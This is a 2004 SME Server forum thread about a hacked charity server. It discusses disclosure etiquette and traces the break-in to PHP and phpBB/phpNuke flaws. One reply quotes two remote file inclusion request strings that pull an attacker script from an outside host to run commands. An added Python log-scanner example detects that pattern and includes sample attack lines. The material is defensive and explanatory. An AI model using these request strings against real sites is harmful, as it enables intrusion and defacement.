Koozali.org: home of the SME Server

Hacked "Simiens Crew Por Um Mundo Melhor"

raem
« on: December 03, 2004, 03:39:55 AM »
Dear All
It looks like a server I maintain for a charity group has been hacked ....

[moderated, original post received through security@contribs.org]
...

NickR
« Reply #1 on: December 03, 2004, 03:58:48 AM »
I'm sure that you probably posted this in haste, but please remember that this is a public forum.

security@contribs.org is a more appropriate place for this report.
--
Nick......

drlizau
« Reply #2 on: December 12, 2004, 12:47:21 AM »
Why is this topic censored?
A security breach needs to be widely known, as we need to know that it has happened and be ready to patch our servers as soon as a patch is available.

raem
« Reply #3 on: December 12, 2004, 04:53:49 AM »
This is looking like a PHP security breach rather than an SME Server security breach, although it is not fully resolved as yet.

See (in Italian)
http://www.glesius.it/forum/topic.asp?TOPIC_ID=3457

part of which translates to:

The technique adopted was to use a string from the browser to bring about a PHP injection situation on the server, to gain access as root (director), and to load a script that carries out a mass defacement of the index of the sites. [site + exploit + cmd =]. This technique was carried out on one of the sites that presented the vulnerability in one of the forms in phpnuke. They used one of the following strings:
www.sito.it/index.php?=http://dominus.webcindario.com/inf.jpg?&cmd=
www.sito.it//modules/My_eGallery/public/displayCategory.php?basepath=http://dominus.webcindario.com/inf.jpg?&cmd=


and also see these sites for an interesting read of text conversation between hacker and hacked.
http://xoomer.virgilio.it/gioxx85/deface/log.htm

Thanks to those who helped me, they know who they are.
...
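
As an added example (not part of the original thread): a log check for the request pattern quoted in the post above, where a query parameter such as basepath carries a remote URL as its value. The log lines, IP addresses and the host files.example.invalid are constructed, and the function name is hypothetical.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache common/combined log line: client, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# A parameter value that is itself a remote URL.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample log (documentation IP ranges, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Dec/2004:03:10:01 +0000] "GET /index.php?name=News HTTP/1.1" 200 5120',
    '198.51.100.7 - - [03/Dec/2004:03:11:42 +0000] "GET //modules/My_eGallery/public/'
    'displayCategory.php?basepath=http://files.example.invalid/inf.jpg?&cmd= HTTP/1.0" 200 812',
    '198.51.100.7 - - [03/Dec/2004:03:12:05 +0000] "GET /index.php?'
    '=http%3A%2F%2Ffiles.example.invalid%2Finf.jpg%3F&cmd= HTTP/1.0" 200 640',
    '192.0.2.33 - - [03/Dec/2004:03:15:27 +0000] "GET /links.php?ref=news&page=2 HTTP/1.1" 200 2210',
]

def find_remote_include_attempts(lines):
    """Return one finding per request that passes a remote URL as a parameter value."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable request line
        # Split on the first "?" by hand: urlsplit() would read a target that
        # starts with "//" (as in the second sample line) as a host name.
        path, _, query = m.group("target").partition("?")
        # parse_qsl percent-decodes, so an encoded "http%3A%2F%2F" is caught too,
        # and it keeps parameters with an empty name ("?=http://...").
        params = parse_qsl(query, keep_blank_values=True)
        remote = [(k, v.strip()) for k, v in params if REMOTE_RE.match(v.strip())]
        if remote:
            findings.append({
                "ip": m.group("ip"),
                "path": path,
                "status": int(m.group("status")),
                "params": [k for k, _ in remote],
                "hosts": sorted({urlsplit(v).hostname or "" for _, v in remote}),
            })
    return findings

if __name__ == "__main__":
    for finding in find_remote_include_attempts(SAMPLE_LOG):
        print(finding)
```

Legitimate redirect or link parameters will also match, so review hits by path and by the remote host they name. The reported hosts are candidates for outbound blocking on the web server.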

raem
« Reply #4 on: January 04, 2005, 01:56:52 AM »
Just as a follow up for readers:

phpBB had a major security vulnerability which, in conjunction with a PHP vulnerability, allowed hackers to get root control.
See
http://www.phpbb.com/phpBB/viewtopic.php?t=241300&postdays=0&postorder=asc&start=0

and
http://www.phpbbstyles.com/viewtopic.php?t=1903

and
http://forums.contribs.org/index.php?topic=25275.0
...